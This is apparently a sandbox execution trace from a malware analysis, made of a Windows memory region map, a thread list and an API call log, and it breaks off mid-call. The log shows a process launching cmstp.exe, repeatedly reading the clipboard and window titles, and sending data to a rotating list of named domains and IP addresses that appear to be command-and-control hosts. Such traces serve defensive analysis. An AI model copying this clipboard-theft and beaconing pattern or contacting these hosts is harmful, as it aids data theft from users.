0x7ffc5eeb8740 region_type = mapped_file name = "setupapi.dll" filename = "\\Windows\\System32\\setupapi.dll" (normalized: "c:\\windows\\system32\\setupapi.dll") Region: id = 845 start_va = 0x7ffc5f2c0000 end_va = 0x7ffc5f53cfff monitored = 0 entry_point = 0x7ffc5f394970 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 846 start_va = 0x7ffc5f540000 end_va = 0x7ffc5f6c5fff monitored = 0 entry_point = 0x7ffc5f58ffc0 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 847 start_va = 0x7ffc5f6f0000 end_va = 0x7ffc5f75efff monitored = 0 entry_point = 0x7ffc5f715f70 region_type = mapped_file name = "coml2.dll" filename = "\\Windows\\System32\\coml2.dll" (normalized: "c:\\windows\\system32\\coml2.dll") Region: id = 848 start_va = 0x7ffc5f760000 end_va = 0x7ffc5f806fff monitored = 0 entry_point = 0x7ffc5f76b4d0 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 849 start_va = 0x7ffc5f810000 end_va = 0x7ffc5f9d0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 850 start_va = 0xa6e0000 end_va = 0xa7ccfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000a6e0000" filename = "" Region: id = 851 start_va = 0x410000 end_va = 0x412fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000410000" filename = "" Region: id = 881 start_va = 0x106e0000 end_va = 0x110c5fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000106e0000" filename = "" Region: id = 882 start_va = 0x410000 end_va = 0x421fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000410000" filename = "" Region: id = 883 start_va = 0x410000 end_va = 0x412fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000410000" filename = "" Region: id = 884 start_va = 0x10160000 end_va = 0x10651fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000010160000" filename = "" Region: id = 1056 start_va = 0x106e0000 end_va = 0x12237fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000106e0000" filename = "" Region: id = 1061 start_va = 0x12240000 end_va = 0x12c25fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000012240000" filename = "" Region: id = 1062 start_va = 0x410000 end_va = 0x413fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000410000" filename = "" Region: id = 1063 start_va = 0x12c30000 end_va = 0x13121fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000012c30000" filename = "" Region: id = 1064 start_va = 0xaff0000 end_va = 0xb133fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000aff0000" filename = "" Region: id = 1066 start_va = 0x12240000 end_va = 0x122bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000012240000" filename = "" Region: id = 1069 start_va = 0x7ffc54680000 end_va = 0x7ffc546e6fff monitored = 0 entry_point = 0x7ffc546863e0 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 1250 start_va = 0x420000 end_va = 0x420fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000420000" filename = "" Region: id = 1795 start_va = 0x122c0000 end_va = 0x127b3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000122c0000" filename = "" Region: id = 1904 start_va = 0x7ffc4cd50000 end_va = 0x7ffc4ceedfff monitored = 0 entry_point = 0x7ffc4cd55480 region_type = mapped_file name = "comsvcs.dll" filename = "\\Windows\\System32\\comsvcs.dll" (normalized: "c:\\windows\\system32\\comsvcs.dll") Region: id = 1905 start_va = 0x7ffc5b440000 end_va = 0x7ffc5b473fff monitored = 0 entry_point = 0x7ffc5b45ae70 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 1906 start_va = 0x400000 end_va = 0x400fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 1931 start_va = 0x410000 end_va = 0x421fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cachedimage_1440_900_pos4.jpg" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\CachedFiles\\CachedImage_1440_900_POS4.jpg" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\microsoft\\windows\\themes\\cachedfiles\\cachedimage_1440_900_pos4.jpg") Region: id = 1932 start_va = 0x9a20000 end_va = 0x9f11fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009a20000" filename = "" Region: id = 2702 start_va = 0x410000 end_va = 0x421fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cachedimage_1440_900_pos4.jpg" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\CachedFiles\\CachedImage_1440_900_POS4.jpg" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\microsoft\\windows\\themes\\cachedfiles\\cachedimage_1440_900_pos4.jpg") Region: id = 2703 start_va = 0x9a20000 end_va = 0x9f11fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009a20000" filename = "" Region: id = 3094 start_va = 0x410000 end_va = 0x41ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000410000" filename = "" Region: id = 3095 start_va = 0x410000 end_va = 0x413fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000410000" filename = "" Region: id = 3096 start_va = 0xaaf0000 end_va = 0xafe1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000aaf0000" filename = "" Region: id = 3097 start_va = 0x122c0000 end_va = 0x1233ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000122c0000" filename = "" Region: id = 3098 start_va = 0x12340000 end_va = 0x123bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000012340000" filename = "" Region: id = 3099 start_va = 0x123c0000 end_va = 0x1243ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000123c0000" filename = "" Region: id = 3100 start_va = 0x12440000 end_va = 0x124bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000012440000" filename = "" Region: id = 3101 start_va = 0x7ffc538a0000 end_va = 0x7ffc538d0fff monitored = 0 entry_point = 0x7ffc538b7820 region_type = mapped_file name = "shutdownux.dll" filename = "\\Windows\\System32\\shutdownux.dll" (normalized: "c:\\windows\\system32\\shutdownux.dll") Region: id = 3102 start_va = 0x124c0000 end_va = 0x1253ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000124c0000" filename = "" Region: id = 3103 start_va = 0x7ffc439e0000 end_va = 0x7ffc439edfff monitored = 0 entry_point = 0x7ffc439e1da0 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 3104 start_va = 0xb140000 end_va = 0xb235fff monitored = 0 entry_point = 0xb141840 region_type = mapped_file name = "basebrd.dll" filename = "\\Windows\\Branding\\Basebrd\\basebrd.dll" (normalized: "c:\\windows\\branding\\basebrd\\basebrd.dll") Region: id = 3105 start_va = 0xb140000 end_va = 0xb235fff monitored = 0 entry_point = 0xb141840 region_type = mapped_file name = "basebrd.dll" filename = "\\Windows\\Branding\\Basebrd\\basebrd.dll" (normalized: "c:\\windows\\branding\\basebrd\\basebrd.dll") Region: id = 3106 start_va = 0x420000 end_va = 0x420fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "basebrd.dll.mui" filename = "\\Windows\\Branding\\Basebrd\\en-US\\basebrd.dll.mui" (normalized: "c:\\windows\\branding\\basebrd\\en-us\\basebrd.dll.mui") Region: id = 3107 start_va = 0x430000 end_va = 0x450fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000430000" filename = "" Region: id = 3108 start_va = 0x420000 end_va = 0x422fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "shutdownux.dll.mui" filename = "\\Windows\\System32\\en-US\\ShutdownUX.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\shutdownux.dll.mui") Region: id = 3109 start_va = 0x8380000 end_va = 0x8419fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000008380000" filename = "" Region: id = 3110 start_va = 0x2900000 end_va = 0x2923fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 3111 start_va = 0x3f10000 end_va = 0x3f31fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003f10000" filename = "" Region: id = 3138 start_va = 0x410000 end_va = 0x414fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "user32.dll.mui" filename = "\\Windows\\System32\\en-US\\user32.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\user32.dll.mui") Region: id = 3139 start_va = 0x125c0000 end_va = 0x1263ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000125c0000" filename = "" Region: id = 3140 start_va = 0x12640000 end_va = 0x126bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000012640000" filename = "" Region: id = 3141 start_va = 0x126c0000 end_va = 0x1273ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000126c0000" filename = "" Region: id = 3142 start_va = 0x440000 end_va = 0x461fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000440000" filename = "" Region: id = 3143 start_va = 0x2900000 end_va = 0x2921fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 3144 start_va = 0x7df5ffb10000 end_va = 0x7df5ffeb0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sysmain.sdb" filename = "\\Windows\\AppPatch\\sysmain.sdb" (normalized: "c:\\windows\\apppatch\\sysmain.sdb") Region: id = 5898 start_va = 0x430000 end_va = 0x43ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000430000" filename = "" Region: id = 5899 start_va = 0x7ffc54ca0000 end_va = 0x7ffc54cabfff monitored = 0 entry_point = 0x7ffc54ca33f0 region_type = mapped_file name = "navshutdown.dll" filename = "\\Windows\\System32\\navshutdown.dll" (normalized: "c:\\windows\\system32\\navshutdown.dll") Region: id = 5900 start_va = 0x430000 end_va = 0x43dfff monitored = 0 entry_point = 0x57e880 region_type = mapped_file name = "ieframe.dll" filename = "\\Windows\\System32\\ieframe.dll" (normalized: "c:\\windows\\system32\\ieframe.dll") Region: id = 5901 start_va = 0x430000 end_va = 0x44dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000430000" filename = "" Region: id = 5902 start_va = 0x12740000 end_va = 0x127bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000012740000" filename = "" Region: id = 5903 start_va = 0x450000 end_va = 0x453fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.1.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Caches\\cversions.1.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\caches\\cversions.1.db") Region: id = 5904 start_va = 0x460000 end_va = 0x463fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.1.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Caches\\cversions.1.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\caches\\cversions.1.db") Region: id = 5905 start_va = 0x510000 end_va = 0x527fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x000000000000000b.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Caches\\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x000000000000000b.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\caches\\{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x000000000000000b.db") Thread: id = 8 os_tid = 0x4c8 Thread: id = 9 os_tid = 0x1224 Thread: id = 10 os_tid = 0x2fc Thread: id = 11 os_tid = 0x6c4 Thread: id = 12 os_tid = 0x8dc Thread: id = 13 os_tid = 0x76c Thread: id = 14 os_tid = 0xdb0 Thread: id = 15 os_tid = 0xd10 Thread: id = 16 os_tid = 0xc08 Thread: id = 17 os_tid = 0xff8 Thread: id = 18 os_tid = 0x4e4 Thread: id = 19 os_tid = 0xa20 Thread: id = 20 os_tid = 0x97c Thread: id = 21 os_tid = 0x984 Thread: id = 22 os_tid = 0x8b4 Thread: id = 23 os_tid = 0x4ac Thread: id = 24 os_tid = 0x4c4 Thread: id = 25 os_tid = 0xbec Thread: id = 26 os_tid = 0x9c0 Thread: id = 27 os_tid = 0x95c Thread: id = 28 os_tid = 0x954 Thread: id = 29 os_tid = 0x83c Thread: id = 30 os_tid = 0x460 Thread: id = 31 os_tid = 0x7f0 Thread: id = 32 os_tid = 0x7ec Thread: id = 33 os_tid = 0x7d0 Thread: id = 34 os_tid = 0x7b0 Thread: id = 35 os_tid = 0x7a8 Thread: id = 36 os_tid = 0x798 Thread: id = 37 os_tid = 0x74c Thread: id = 38 os_tid = 0x73c Thread: id = 39 os_tid = 0x734 Thread: id = 40 os_tid = 0x724 Thread: id = 41 os_tid = 0x720 Thread: id = 42 os_tid = 0x71c Thread: id = 43 os_tid = 0x6e8 Thread: id = 44 os_tid = 0x6dc Thread: id = 45 os_tid = 0x6bc Thread: id = 46 os_tid = 0x6b8 Thread: id = 47 os_tid = 0x6b4 Thread: id = 48 os_tid = 0x6b0 Thread: id = 49 os_tid = 0x6ac Thread: id = 50 os_tid = 0x694 Thread: id = 51 os_tid = 0x690 Thread: id = 52 os_tid = 0x684 Thread: id = 53 os_tid = 0x668 [0113.657] CreateProcessInternalW (in: hUserToken=0x0, lpApplicationName="C:\\Windows\\SysWOW64\\cmstp.exe", lpCommandLine=0x0, lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x800000c, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0xcf928*(cb=0x68, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0xcf900, hNewToken=0x0 | out: lpProcessInformation=0xcf900*(hProcess=0x1ab0, hThread=0x15fc, dwProcessId=0x3f8, dwThreadId=0x154), hNewToken=0x0) returned 1 [0129.797] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0xcf5a0 | out: HeapArray=0xcf5a0*=0x570000) returned 0x5 [0129.804] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x3da0) returned 0x4b13430 [0129.817] RtlQueryEnvironmentVariable_U (in: Environment=0x0, Name="USERNAME", Value=0xcf380 | out: Value="RDhJ0CNFevzX") returned 0x0 [0129.869] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0xcf5a0 | out: HeapArray=0xcf5a0*=0x570000) returned 0x5 [0129.876] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x4000) returned 0x8566040 [0129.910] LdrGetProcedureAddress (in: BaseAddress=0x7ffc5e3e0000, Name="CoUninitialize", Ordinal=0x0, ProcedureAddress=0xcf810 | out: ProcedureAddress=0xcf810*=0x7ffc5f321540) returned 0x0 [0129.913] LdrGetProcedureAddress (in: BaseAddress=0x7ffc5e3e0000, Name="CoInitializeEx", Ordinal=0x0, ProcedureAddress=0xcf810 | out: ProcedureAddress=0xcf810*=0x7ffc5f322c50) returned 0x0 [0129.916] LdrGetProcedureAddress (in: BaseAddress=0x7ffc5e3e0000, Name="CoCreateInstance", Ordinal=0x0, ProcedureAddress=0xcf810 | out: ProcedureAddress=0xcf810*=0x7ffc5f35fb70) returned 0x0 [0129.995] RtlQueryEnvironmentVariable_U (in: Environment=0x0, Name="USERNAME", Value=0xcf100 | out: Value="RDhJ0CNFevzX") returned 0x0 [0130.005] RtlQueryEnvironmentVariable_U (in: Environment=0x0, Name="APPDATA", Value=0xcf400 | out: Value="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming") returned 0x0 [0130.076] ObtainUserAgentString (in: dwOption=0x0, pszUAOut=0xcf3de, cbSize=0xcf3b0 | out: pszUAOut="Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko", cbSize=0xcf3b0) returned 0x0 [0130.231] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0xcf7b0 | out: lpWSAData=0xcf7b0) returned 0 [0130.238] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xb0ae7d5, lpParameter=0xb0b3636, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1bf4 Thread: id = 63 os_tid = 0x6c0 [0130.258] Sleep (dwMilliseconds=0x1388) [0135.259] OpenClipboard (hWndNewOwner=0x0) returned 1 [0135.260] GetClipboardData (uFormat=0xd) returned 0x4a21810 [0135.260] GlobalLock (hMem=0x4a21810) returned 0x4a21810 [0135.261] GetForegroundWindow () returned 0x2007c [0135.261] GetWindowTextW (in: hWnd=0x2007c, lpString=0xb0b72a2, nMaxCount=260 | out: lpString="") returned 0 [0135.262] GlobalUnlock (hMem=0x4a21810) returned 1 [0135.262] CloseClipboard () returned 1 [0135.263] socket (af=2, type=1, protocol=6) returned 0x1f2c [0135.266] getaddrinfo (in: pNodeName="www.bordandoartes.com", pServiceName="80", pHints=0x4b13478*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x4b134a8 | out: ppResult=0x4b134a8*=0x4c8a910*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x852f6a0*(sa_family=2, sin_port=0x50, sin_addr="192.185.213.75"), ai_next=0x0)) returned 0 [0135.589] htons (hostshort=0x50) returned 0x5000 [0135.589] connect (s=0x1f2c, name=0x852f6a0*(sa_family=2, sin_port=0x50, sin_addr="192.185.213.75"), namelen=16) returned 0 [0135.732] RtlIntegerToChar (in: Value=0xf9, Base=0x0, Length=0x8, String=0x122bfe08 | out: String="249") returned 0x0 [0135.732] send (s=0x1f2c, buf=0xb0bff22*, len=663, flags=0) returned 663 [0135.732] closesocket (s=0x1f2c) returned 0 [0135.734] socket (af=2, type=1, protocol=6) returned 0x1f2c [0135.734] connect (s=0x1f2c, name=0x852f6a0*(sa_family=2, sin_port=0x50, sin_addr="192.185.213.75"), namelen=16) returned 0 [0135.929] send (s=0x1f2c, buf=0xb0dd322*, len=173, flags=0) returned 173 [0135.930] setsockopt (s=0x1f2c, level=65535, optname=4102, optval="ô\x01", optlen=4) returned 0 [0135.930] recv (in: s=0x1f2c, buf=0x10a62d6c, len=2048000, flags=0 | out: buf=0x10a62d6c*) returned 447 [0136.426] closesocket (s=0x1f2c) returned 0 [0136.427] Sleep (dwMilliseconds=0x1388) [0141.482] OpenClipboard (hWndNewOwner=0x0) returned 1 [0141.486] GetClipboardData (uFormat=0xd) returned 0x4a20ff0 [0141.486] GlobalLock (hMem=0x4a20ff0) returned 0x4a20ff0 [0141.495] GlobalUnlock (hMem=0x4a20ff0) returned 1 [0141.495] CloseClipboard () returned 1 [0141.527] socket (af=2, type=1, protocol=6) returned 0x197c [0141.527] getaddrinfo (in: pNodeName="www.appleluis.host", pServiceName="80", pHints=0x4b13818*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x4b13848 | out: ppResult=0x4b13848*=0x0) returned 11001 [0141.714] getaddrinfo (in: pNodeName="www.appleluis.host", pServiceName="80", pHints=0x4b13818*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x4b13848 | out: ppResult=0x4b13848*=0x0) returned 11001 [0141.754] Sleep (dwMilliseconds=0x1388) [0146.802] OpenClipboard (hWndNewOwner=0x0) returned 1 [0146.802] GetClipboardData (uFormat=0xd) returned 0x4a20b40 [0146.803] GlobalLock (hMem=0x4a20b40) returned 0x4a20b40 [0146.810] GetForegroundWindow () returned 0x2007c [0146.811] GetWindowTextW (in: hWnd=0x2007c, lpString=0xb0b72a2, nMaxCount=260 | out: lpString="") returned 0 [0146.838] GlobalUnlock (hMem=0x4a20b40) returned 1 [0146.838] CloseClipboard () returned 1 [0146.884] socket (af=2, type=1, protocol=6) returned 0x1cc4 [0146.885] getaddrinfo (in: pNodeName="www.searchengineeye.com", pServiceName="80", pHints=0x4b13bb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x4b13be8 | out: ppResult=0x4b13be8*=0x4c8ad10*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x4b4d020*(sa_family=2, sin_port=0x50, sin_addr="160.153.136.3"), ai_next=0x0)) returned 0 [0146.929] connect (s=0x1cc4, name=0x4b4d020*(sa_family=2, sin_port=0x50, sin_addr="160.153.136.3"), namelen=16) returned 0 [0146.974] RtlIntegerToChar (in: Value=0x1bd, Base=0x0, Length=0x8, String=0x122bfe08 | out: String="445") returned 0x0 [0146.974] send (s=0x1cc4, buf=0xb0bff22*, len=865, flags=0) returned 865 [0146.976] closesocket (s=0x1cc4) returned 0 [0146.978] socket (af=2, type=1, protocol=6) returned 0x1cc4 [0146.978] connect (s=0x1cc4, name=0x4b4d020*(sa_family=2, sin_port=0x50, sin_addr="160.153.136.3"), namelen=16) returned 0 [0147.002] send (s=0x1cc4, buf=0xb0dd322*, len=175, flags=0) returned 175 [0147.003] setsockopt (s=0x1cc4, level=65535, optname=4102, optval="ô\x01", optlen=4) returned 0 [0147.003] recv (in: s=0x1cc4, buf=0x10a62d6c, len=2048000, flags=0 | out: buf=0x10a62d6c*) returned 47 [0147.046] closesocket (s=0x1cc4) returned 0 [0147.046] Sleep (dwMilliseconds=0x1388) [0152.047] OpenClipboard (hWndNewOwner=0x0) returned 1 [0152.047] GetClipboardData (uFormat=0xd) returned 0x4a21ae0 [0152.048] GlobalLock (hMem=0x4a21ae0) returned 0x4a21ae0 [0152.048] GlobalUnlock (hMem=0x4a21ae0) returned 1 [0152.048] CloseClipboard () returned 1 [0152.048] socket (af=2, type=1, protocol=6) returned 0x2140 [0152.049] getaddrinfo (in: pNodeName="www.restate.club", pServiceName="80", pHints=0x4b13f58*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x4b13f88 | out: ppResult=0x4b13f88*=0x85d3030*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x4b4d940*(sa_family=2, sin_port=0x50, sin_addr="34.102.136.180"), ai_next=0x0)) returned 0 [0152.082] connect (s=0x2140, name=0x4b4d940*(sa_family=2, sin_port=0x50, sin_addr="34.102.136.180"), namelen=16) returned 0 [0152.106] RtlIntegerToChar (in: Value=0x1bd, Base=0x0, Length=0x8, String=0x122bfe08 | out: String="445") returned 0x0 [0152.106] send (s=0x2140, buf=0xb0bff22*, len=844, flags=0) returned 844 [0152.107] closesocket (s=0x2140) returned 0 [0152.108] socket (af=2, type=1, protocol=6) returned 0x2140 [0152.108] connect (s=0x2140, name=0x4b4d940*(sa_family=2, sin_port=0x50, sin_addr="34.102.136.180"), namelen=16) returned 0 [0152.132] send (s=0x2140, buf=0xb0dd322*, len=168, flags=0) returned 168 [0152.133] setsockopt (s=0x2140, level=65535, optname=4102, optval="ô\x01", optlen=4) returned 0 [0152.133] recv (in: s=0x2140, buf=0x10a62d6c, len=2048000, flags=0 | out: buf=0x10a62d6c*) returned 461 [0152.271] closesocket (s=0x2140) returned 0 [0152.272] Sleep (dwMilliseconds=0x1388) [0152.273] OpenClipboard (hWndNewOwner=0x0) returned 1 [0152.273] GetClipboardData (uFormat=0xd) returned 0x4a216d0 [0152.273] GlobalLock (hMem=0x4a216d0) returned 0x4a216d0 [0152.273] GlobalUnlock (hMem=0x4a216d0) returned 1 [0152.273] CloseClipboard () returned 1 [0152.273] socket (af=2, type=1, protocol=6) returned 0x2140 [0152.274] getaddrinfo (in: pNodeName="www.sehatbersama.store", pServiceName="80", pHints=0x4b142f8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x4b14328 | out: ppResult=0x4b14328*=0x85d6470*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x4b4d820*(sa_family=2, sin_port=0x50, sin_addr="45.13.133.216"), ai_next=0x0)) returned 0 [0152.305] connect (s=0x2140, name=0x4b4d820*(sa_family=2, sin_port=0x50, sin_addr="45.13.133.216"), namelen=16) returned 0 [0152.686] RtlIntegerToChar (in: Value=0x1bd, Base=0x0, Length=0x8, String=0x122bfe08 | out: String="445") returned 0x0 [0152.686] send (s=0x2140, buf=0xb0bff22*, len=862, flags=0) returned 862 [0152.687] closesocket (s=0x2140) returned 0 [0152.719] socket (af=2, type=1, protocol=6) returned 0x2140 [0152.719] connect (s=0x2140, name=0x4b4d820*(sa_family=2, sin_port=0x50, sin_addr="45.13.133.216"), namelen=16) returned 0 [0152.890] send (s=0x2140, buf=0xb0dd322*, len=174, flags=0) returned 174 [0152.891] setsockopt (s=0x2140, level=65535, optname=4102, optval="ô\x01", optlen=4) returned 0 [0152.891] recv (in: s=0x2140, buf=0x10a62d6c, len=2048000, flags=0 | out: buf=0x10a62d6c*) returned 514 [0153.217] closesocket (s=0x2140) returned 0 [0153.218] Sleep (dwMilliseconds=0x1388) [0153.254] OpenClipboard (hWndNewOwner=0x0) returned 1 [0153.254] GetClipboardData (uFormat=0xd) returned 0x4a20b90 [0153.254] GlobalLock (hMem=0x4a20b90) returned 0x4a20b90 [0153.254] GlobalUnlock (hMem=0x4a20b90) returned 1 [0153.254] CloseClipboard () returned 1 [0153.255] socket (af=2, type=1, protocol=6) returned 0x2160 [0153.255] getaddrinfo (in: pNodeName="www.immerseinagro.com", pServiceName="80", pHints=0x4b14698*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x4b146c8 | out: ppResult=0x4b146c8*=0x0) returned 11002 [0154.685] getaddrinfo (in: pNodeName="www.immerseinagro.com", pServiceName="80", pHints=0x4b14698*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x4b146c8 | out: ppResult=0x4b146c8*=0x0) returned 11002 [0154.688] Sleep (dwMilliseconds=0x1388) [0154.690] OpenClipboard (hWndNewOwner=0x0) returned 1 [0154.690] GetClipboardData (uFormat=0xd) returned 0x4a20b40 [0154.690] GlobalLock (hMem=0x4a20b40) returned 0x4a20b40 [0154.690] GlobalUnlock (hMem=0x4a20b40) returned 1 [0154.690] CloseClipboard () returned 1 [0154.690] socket (af=2, type=1, protocol=6) returned 0x2138 [0154.691] getaddrinfo (in: pNodeName="www.yota.store", pServiceName="80", pHints=0x4b14a38*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x4b14a68 | out: ppResult=0x4b14a68*=0x85d64f0*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x4b4d8a0*(sa_family=2, sin_port=0x50, sin_addr="52.58.78.16"), ai_next=0x0)) returned 0 [0154.753] connect (s=0x2138, name=0x4b4d8a0*(sa_family=2, sin_port=0x50, sin_addr="52.58.78.16"), namelen=16) returned 0 [0154.777] RtlIntegerToChar (in: Value=0x1bd, Base=0x0, Length=0x8, String=0x122bfe08 | out: String="445") returned 0x0 [0154.777] send (s=0x2138, buf=0xb0bff22*, len=838, flags=0) returned 838 [0154.778] closesocket (s=0x2138) returned 0 [0154.778] socket (af=2, type=1, protocol=6) returned 0x2138 [0154.779] connect (s=0x2138, name=0x4b4d8a0*(sa_family=2, sin_port=0x50, sin_addr="52.58.78.16"), namelen=16) returned 0 [0154.799] send 